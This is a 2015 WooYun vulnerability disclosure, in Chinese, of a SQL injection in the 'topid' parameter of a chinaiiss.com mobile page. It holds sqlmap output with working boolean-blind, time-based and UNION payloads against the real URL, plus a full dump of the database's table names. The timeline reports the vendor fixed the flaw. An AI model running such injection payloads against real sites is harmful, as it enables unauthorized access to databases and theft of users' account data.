当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144729

漏洞标题:中国战略网某站存在SQL注入可UNION(涉及69万账号信息)

相关厂商:chinaiiss.com

漏洞作者: 路人甲

提交时间:2015-10-04 16:13

修复时间:2015-10-09 10:56

公开时间:2015-10-09 10:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-04: 细节已通知厂商并且等待厂商处理中
2015-10-08: 厂商已经确认,细节仅向厂商公开
2015-10-09: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

详细说明:

http://wap.chinaiiss.com/do.php?ac=getnextarticle&do=touch&inajax=1&number=15&topid=4&vtype=touch 注入点:topid

11.jpg

CIS库:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: topid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ac=getnextarticle&do=touch&inajax=1&number=15&topid=4 AND 8593=8593&vtype=touch
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: ac=getnextarticle&do=touch&inajax=1&number=15&topid=4 AND (SELECT * FROM (SELECT(SLEEP(5)))ZEyk)&vtype=touch
    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: ac=getnextarticle&do=touch&inajax=1&number=15&topid=4 UNION ALL SELECT CONCAT(0x7178766a71,0x76596154616954595344,0x7178787671),NULL,NULL,NULL,NULL-- &vtype=touch
---
web application technology: PHP 5.3.6
back-end DBMS: MySQL 5.0.12
Database: cis
[227 tables]
+-------------------------------+
| forum_remark                  |
| iiss_admin                    |
| iiss_adminsession             |
| iiss_admintype                |
| iiss_answer                   |
| iiss_article                  |
| iiss_article_hezuo            |
| iiss_article_sendmail         |
| iiss_article_special          |
| iiss_article_specialfield     |
| iiss_articlefield             |
| iiss_articlemodify            |
| iiss_articlerelated           |
| iiss_attachment               |
| iiss_banned                   |
| iiss_blogger_iprecord         |
| iiss_blogger_vote             |
| iiss_bottom                   |
| iiss_clickcount               |
| iiss_clickinfo                |
| iiss_clicklocation            |
| iiss_clickrecord              |
| iiss_conference               |
| iiss_conference_author_praise |
| iiss_conference_candidate     |
| iiss_conference_praise_record |
| iiss_conference_user_medal    |
| iiss_contest                  |
| iiss_contest_question         |
| iiss_contest_record           |
| iiss_contest_userquestion     |
| iiss_contest_userscore        |
| iiss_country                  |
| iiss_country_area             |
| iiss_datatype                 |
| iiss_day                      |
| iiss_defense_elite            |
| iiss_delrecord                |
| iiss_downimage                |
| iiss_facecount                |
| iiss_figure                   |
| iiss_figure_character         |
| iiss_figure_impression        |
| iiss_figure_year              |
| iiss_file_attachment          |
| iiss_guestbook                |
| iiss_hero                     |
| iiss_hire                     |
| iiss_history_today            |
| iiss_hours                    |
| iiss_hours2                   |
| iiss_image                    |
| iiss_image_comic              |
| iiss_imagefield               |
| iiss_index_accesslog          |
| iiss_infocategory             |
| iiss_infocomment              |
| iiss_infomodel                |
| iiss_jump                     |
| iiss_leader                   |
| iiss_links                    |
| iiss_links_record             |
| iiss_linkscooper              |
| iiss_linkstype                |
| iiss_list_accesslog           |
| iiss_livetelecast             |
| iiss_livetelecast_article     |
| iiss_member                   |
| iiss_member_failedlogins      |
| iiss_member_field             |
| iiss_member_recommend         |
| iiss_member_verifycode        |
| iiss_member_verifycode2       |
| iiss_milarea                  |
| iiss_milcontrast              |
| iiss_milcountry               |
| iiss_milcountryelse           |
| iiss_mobile_apps              |
| iiss_mobile_article           |
| iiss_mobile_conference        |
| iiss_mobile_image             |
| iiss_mobile_manual            |
| iiss_mobile_pk                |
| iiss_mobile_version           |
| iiss_mobile_wallpaper         |
| iiss_navi                     |
| iiss_people                   |
| iiss_perspective              |
| iiss_perspectivefield         |
| iiss_pk                       |
| iiss_pkvote                   |
| iiss_pkvoteuser               |
| iiss_promotion_iprecord       |
| iiss_promotionlink            |
| iiss_promotionstatistics      |
| iiss_question                 |
| iiss_quick_member             |
| iiss_review_record            |
| iiss_session                  |
| iiss_sethome                  |
| iiss_spec_baodiaovote         |
| iiss_spec_baodiaovotetotal    |
| iiss_spec_nanhai              |
| iiss_spec_qiongdingzhixia     |
| iiss_spec_seekones            |
| iiss_special                  |
| iiss_special_foruminfo        |
| iiss_spiderpic                |
| iiss_sysdata                  |
| iiss_table                    |
| iiss_tag                      |
| iiss_tagart                   |
| iiss_tagartspec               |
| iiss_taghero                  |
| iiss_tagimg                   |
| iiss_tagperspective           |
| iiss_tagsend                  |
| iiss_updatearticle            |
| iiss_userquestion             |
| iiss_viewrecord_201002        |
| iiss_viewrecord_201003        |
| iiss_viewrecord_201004        |
| iiss_viewrecord_201005        |
| iiss_viewrecord_201006        |
| iiss_viewrecord_201007        |
| iiss_viewrecord_201008        |
| iiss_viewrecord_201009        |
| iiss_viewrecord_201010        |
| iiss_viewrecord_201011        |
| iiss_viewrecord_201012        |
| iiss_viewrecord_201101        |
| iiss_viewrecord_201102        |
| iiss_viewrecord_201103        |
| iiss_viewrecord_201104        |
| iiss_viewrecord_201105        |
| iiss_viewrecord_201106        |
| iiss_viewrecord_201107        |
| iiss_viewrecord_201108        |
| iiss_viewrecord_201109        |
| iiss_viewrecord_201110        |
| iiss_viewrecord_201111        |
| iiss_viewrecord_201112        |
| iiss_viewrecord_201201        |
| iiss_viewrecord_201202        |
| iiss_viewrecord_201203        |
| iiss_viewrecord_201204        |
| iiss_viewrecord_201205        |
| iiss_viewrecord_201206        |
| iiss_viewrecord_201207        |
| iiss_viewrecord_201208        |
| iiss_viewrecord_201209        |
| iiss_viewrecord_201210        |
| iiss_viewrecord_201211        |
| iiss_viewrecord_201212        |
| iiss_viewrecord_201301        |
| iiss_viewrecord_201302        |
| iiss_viewrecord_201303        |
| iiss_viewrecord_201304        |
| iiss_viewrecord_201305        |
| iiss_viewrecord_201306        |
| iiss_viewrecord_201307        |
| iiss_viewrecord_201308        |
| iiss_viewrecord_201309        |
| iiss_viewrecord_201310        |
| iiss_viewrecord_201311        |
| iiss_viewrecord_201312        |
| iiss_viewrecord_201401        |
| iiss_viewrecord_201402        |
| iiss_viewrecord_201403        |
| iiss_viewrecord_201404        |
| iiss_viewrecord_201405        |
| iiss_viewrecord_201406        |
| iiss_viewrecord_201407        |
| iiss_viewrecord_201408        |
| iiss_viewrecord_201409        |
| iiss_viewrecord_201410        |
| iiss_viewrecord_201411        |
| iiss_viewrecord_201412        |
| iiss_viewrecord_201501        |
| iiss_viewrecord_201502        |
| iiss_viewrecord_201503        |
| iiss_viewrecord_201504        |
| iiss_viewrecord_201505        |
| iiss_viewrecord_201506        |
| iiss_viewrecord_201507        |
| iiss_viewrecord_201508        |
| iiss_viewrecord_201509        |
| iiss_viewrecord_201510        |
| iiss_viewrecord_day           |
| iiss_viewrecord_daybysite     |
| iiss_voice                    |
| iiss_voice_news               |
| iiss_vote                     |
| iiss_votetype                 |
| iiss_voteuser                 |
| iiss_wap_article              |
| iiss_wap_image                |
| iiss_wap_pk                   |
| iiss_weaponspec               |
| iiss_weibo_activeusers        |
| iiss_weibo_friendships        |
| iiss_weibo_repost             |
| iiss_weibo_repostrecord       |
| iiss_weibo_repostusers_record |
| iiss_weibo_tokenuser          |
| iiss_weibo_users              |
| iiss_wikipedia                |
| iiss_wikipediaedition         |
| iiss_wikipediafield           |
| iiss_worship                  |
| iiss_writer                   |
| iiss_writerart                |
| iiss_writerartfield           |
| iiss_yearvoterecord           |
| iissblog_album                |
| iissblog_blog                 |
| iissblog_blog2                |
| iissblog_class                |
| iissblog_comment              |
| iissblog_favorites            |
| iissblog_feed                 |
| iissblog_log                  |
| iissblog_pic                  |
| iissblog_pic_favorites        |
| iissblog_user                 |
| iissblog_user_20140806        |
| iissblog_viewnum              |
+-------------------------------+

69万账户:

12.png

13.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-08 23:54

厂商回复:

感谢支持

最新状态:

2015-10-09:已修复,感谢支持

2015-10-09:感谢支持